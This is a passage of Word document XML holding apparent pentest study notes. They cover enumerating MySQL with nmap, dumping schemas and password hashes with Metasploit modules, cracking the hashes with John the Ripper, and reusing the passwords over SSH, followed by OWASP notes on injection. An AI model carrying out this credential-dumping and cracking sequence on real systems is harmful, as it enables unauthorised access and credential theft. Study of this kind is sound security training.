          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Nmaps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mysql-enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432C0999" w14:textId="4C5C06A4" w:rsidR="008F2639" w:rsidRPr="0084205E" w:rsidRDefault="008F2639" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Nmap -A -p- -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01779D4B" w14:textId="14BC4E19" w:rsidR="008F2639" w:rsidRPr="0084205E" w:rsidRDefault="008F2639" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Port 3306</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170CDE97" w14:textId="3881BA71" w:rsidR="00F4076D" w:rsidRPr="0084205E" w:rsidRDefault="00F4076D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Check credentials with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -h &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt; -u &lt;username&gt; -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA4F20" w14:textId="5DAA550E" w:rsidR="00F4076D" w:rsidRPr="0084205E" w:rsidRDefault="00F4076D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026D36FF" w14:textId="2329DE75" w:rsidR="00F4076D" w:rsidRPr="0084205E" w:rsidRDefault="00F4076D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mysql_sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1847EC8C" w14:textId="350FF40C" w:rsidR="00F4076D" w:rsidRPr="0084205E" w:rsidRDefault="00F4076D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PASSWORD, RHOSTS, USERNAME, SQL (change to show databases)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E7863A" w14:textId="5E2EC0F5" w:rsidR="00F4076D" w:rsidRPr="0084205E" w:rsidRDefault="00F4076D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D59260" w14:textId="40124BFF" w:rsidR="00F4076D" w:rsidRPr="0084205E" w:rsidRDefault="00F4076D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Search for version – select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>module(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FA5519" w14:textId="3D53BDDC" w:rsidR="00F4076D" w:rsidRPr="0084205E" w:rsidRDefault="00F4076D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploiting MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A7785D" w14:textId="64A74B10" w:rsidR="00F4076D" w:rsidRPr="0084205E" w:rsidRDefault="00F4076D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">At this point, </w:t>
      </w:r>
      <w:r w:rsidR="00C83160" w:rsidRPr="0084205E">
        <w:t>MySQL server credentials are known</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F7A385" w14:textId="4784CD53" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Version of MySQL running is known</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC5BF3F" w14:textId="7FF95010" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>The number of Databases and names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A817112" w14:textId="78CA31A5" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Key Terminology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDF7F93" w14:textId="72DB386C" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F106B1D" w14:textId="41AC5806" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BD8924" w14:textId="106D65D5" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can substitute schema instead of database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE8504E" w14:textId="14B172D4" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Not all database products use interchangeable terminology (such as Oracle Database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768EDDB1" w14:textId="656EEE79" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBF92E9" w14:textId="3A35F280" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Product of cryptographic algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A4DC76" w14:textId="614FABD9" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can be used to index data into a hash table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48808D2E" w14:textId="0692E760" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Each hash has unique ID that serves as a pointer to original data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC2FAAF" w14:textId="0922AE40" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Creates smaller index, faster and more efficient search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12838500" w14:textId="3702D97F" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Search for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mysql_schemadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="035EACA4" w14:textId="3B66A095" w:rsidR="00C83160" w:rsidRPr="0084205E" w:rsidRDefault="00C83160" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Set options and exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2B3BAF" w14:textId="7B6248B7" w:rsidR="00FB325C" w:rsidRPr="0084205E" w:rsidRDefault="00FB325C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Search for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mysql_hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="048C97D5" w14:textId="3D9B54E9" w:rsidR="00FB325C" w:rsidRPr="0084205E" w:rsidRDefault="00FB325C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Set options and exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B15536D" w14:textId="3BF104D6" w:rsidR="00FB325C" w:rsidRPr="0084205E" w:rsidRDefault="00FB325C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find users and password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2853626E" w14:textId="7B90E6AD" w:rsidR="00FB325C" w:rsidRPr="0084205E" w:rsidRDefault="00FB325C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Copy hash string (from name to end) to text file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE7429" w14:textId="7D7C5DF8" w:rsidR="00FB325C" w:rsidRPr="0084205E" w:rsidRDefault="00FB325C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Run JohntheRipper against it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272DF6AB" w14:textId="55493A98" w:rsidR="00FB325C" w:rsidRPr="0084205E" w:rsidRDefault="00FB325C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Syntax: john hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7559B48E" w14:textId="17A0F336" w:rsidR="00FB325C" w:rsidRPr="0084205E" w:rsidRDefault="00FB325C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>new found</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> passwords and profiles to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> remote users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149F0BF4" w14:textId="07E49FCC" w:rsidR="00620EAC" w:rsidRPr="0084205E" w:rsidRDefault="00620EAC" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E835358" w14:textId="1EF488F0" w:rsidR="00620EAC" w:rsidRPr="0084205E" w:rsidRDefault="0021613B" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2636349C" w14:textId="55E9FCCA" w:rsidR="0021613B" w:rsidRPr="0084205E" w:rsidRDefault="00F868D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C93BCC2" w14:textId="7E89BD4A" w:rsidR="00F868D8" w:rsidRPr="0084205E" w:rsidRDefault="00075B94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Common flaw in applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052FC496" w14:textId="1A652478" w:rsidR="00075B94" w:rsidRPr="0084205E" w:rsidRDefault="00075B94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Occur because </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>user controlled</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> input is interpreted as actual commands or parameters by application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3534CB50" w14:textId="495AD57A" w:rsidR="00075B94" w:rsidRPr="0084205E" w:rsidRDefault="00075B94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Dependent on technology used and how input is interpreted </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBC73F3" w14:textId="60493D0C" w:rsidR="00075B94" w:rsidRPr="0084205E" w:rsidRDefault="00075B94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SQL Injection – controlled input is passed to SQL queries, manipulating outcome of said queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B7DD95" w14:textId="3EE47026" w:rsidR="00075B94" w:rsidRPr="0084205E" w:rsidRDefault="00075B94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Command Injection – user input is passed to system commands. Execute arbitrary system commands on application servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF3400" w14:textId="14DD2BD9" w:rsidR="00075B94" w:rsidRPr="0084205E" w:rsidRDefault="00075B94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If input is passed and interpreted correctly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E7F25C" w14:textId="0BDB9EDC" w:rsidR="00075B94" w:rsidRPr="0084205E" w:rsidRDefault="00075B94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Access, modify, delete information in a database – leading to the stealing of sensitive information such as personal details and credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036A1B98" w14:textId="64732491" w:rsidR="00075B94" w:rsidRPr="0084205E" w:rsidRDefault="00075B94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Execute arbitrary system commands on a server to gain access to user systems. Enable them to steal sensitive data and carry out attacks against infrastructure linked to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EA931" w14:textId="70D2C8F6" w:rsidR="00075B94" w:rsidRPr="0084205E" w:rsidRDefault="00075B94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">The main defense is ensuring </w:t>
      </w:r>
      <w:r w:rsidR="008B1173" w:rsidRPr="0084205E">
        <w:t>user-controlled</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> input is not interpreted as queries or commands</w:t>
      </w:r>
    </w:p>
